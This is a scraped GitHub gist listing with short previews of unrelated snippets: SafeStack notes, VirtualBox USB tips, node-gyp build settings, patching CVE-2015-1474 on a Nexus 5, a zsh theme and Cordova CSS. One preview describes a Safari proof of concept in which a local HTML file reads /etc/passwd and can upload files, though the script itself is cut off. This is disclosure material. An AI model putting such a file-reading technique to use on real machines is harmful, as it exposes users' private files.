Skip to content

Instantly share code, notes, and snippets.

Mostly on these days...

David Weinstein dweinstein

Mostly on these days...
View GitHub Profile
yrp604 /
Last active Mar 29, 2017
Safe Stack Notes

Note: I've only briefly read the related CPI paper (PDF), this is just initial impressions after playing around with it a bit.

All the code and binaries I used can be downloaded here. Note that I removed -DFORTIFY_SOURCE=2 to make the examples a bit simpler.

-fsanitize=safe-stack basically seems to move stack based buffers off the actual stack, onto another segment of memory (I'll call it the fake stack). The actual stack then stores references to this segment. For example:

char buf[20];
printf("%p\n", buf);
dweinstein / LICENSE
Last active Mar 30, 2016
mega rename class based on source, etc.
The MIT License (MIT)
Copyright (c) 2015 David Weinstein
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
dweinstein /
Last active Mar 24, 2016
EHCI Extension Pack, USB, VirtualBox

so I learned two things with usb on virtualbox (OS X):

    1. it sucks, 2) it sucks less if you enable the extension pack for ehci:
  • w/ out ehci I could not install a 28 MB APK from within boot2docker. maybe if I was willing to wait long enough but AFAICT it would not complete.

± % docker run --privileged -v=/dev/bus/usb:/dev/bus/usb --rm -t -i -v pwd:/provision analysis /bin/bash

  • w/out EHCI
ralphtheninja /
Last active Jul 2, 2019
Use JOBS=max to speed up native node modules

When npm installs native node modules it uses node-gyp to compile code. This is the seam node uses for targeting different operating systems, e.g. OS X, linux, Windows etc.

By default node-gyp compiles using one core and if you have more than one you probably want to utilize that power to speed up compile time. The way node-gyp handles this is by using the JOBS environment variable, which sets the jobs variable here. This piece of code then checks the value of jobs to determine how many cores to use.

Note that if the value of JOBS is max then all cores will be used. So lets try this on leveldown. First lets check that JOBS isn't set yet:

lms@ux301|01:34|~/src/leveldb-repos/leveldown (master) $ echo $JOBS

rongarret / gist:d8987c9cd57bd768e1de
Last active Aug 29, 2015
Safari FILE: scheme security hole
View gist:d8987c9cd57bd768e1de
It appears that Safari does not enforce any kind of access
restrictions for XMLHTTPRequests on FILE: scheme URLs. As a
result, any HTML file on the local file system that is opened in
Safari can read any file that the user has access to (and, of
course, it can upload those files too). Here's a little
proof-of-concept. Copy and paste this into a local HTML file and
open it in Safari. It will display the contents of /etc/passwd.
<script src=></script>
View gist:849eb63d28f7e7bb8c97
var test = require('tape');
var bytewise = require('bytewise');
var encode = bytewise.encode;
var MIN = bytewise.MIN;
var MAX = bytewise.MAX;
test('tuple queries', function (t) {
var yearly = tuples('reports', 'yearly');
// component keys of the tuple space query are available by index
Fuzion24 /
Last active Sep 25, 2015
Patching CVE-2015-1474 -- Remotely exploitable graphics buffer overflow on my Nexus device (N5 5.0.1)

This is a brief guide on how I patched the CVE-2015-1474 for my Nexus 5 - 5.0.1. This involes downloading and building AOSP with the patch for the vuln applied. I have attached a pre-built patched version of for the Nexus5 5.0.1 in the case you are too lazy to build it yourself (and you trust me).

Building patched libui for your nexus device

repo init -u -b android-5.0.1_r1
repo sync -j16

cd frameworks/native
git cherry-pick 2bc5e811a817a8c667bca4318ae98582b0ee6dc6
View agnoster-custom.zsh-theme
# vim:ft=zsh ts=2 sw=2 sts=2
# agnoster's Theme -
# A Powerline-inspired theme for ZSH
# In order for this theme to render correctly, you will need a
# [Powerline-patched font](

Android 5.0

I/chromium( 6890): [INFO:CONSOLE(37)] "AddJavascriptInterface: top[Android]: com.WebAppInterface@3847a08c - 
error: Access to java.lang.Object.getClass is blocked", source: http://[REDACTED].com/ (37)

For applications targeting Android >= 5.0, you can enumerate the methods available from inside javascript. "Enumeration of methods will be enabled for applications targeting API levels newer than KitKat (to preserve compatibility with older apps)."

kacole2 / CSS
Created Nov 3, 2014
Phonegap Cordova Geolocation with Google Maps Javascript API v3
View CSS
* {
-webkit-tap-highlight-color: rgba(0,0,0,0); /* make transparent link selection, adjust last value opacity 0 to 1.0 */
html, body {
width: 100%;
height: 100%;
padding-top: 10%;
You can’t perform that action at this time.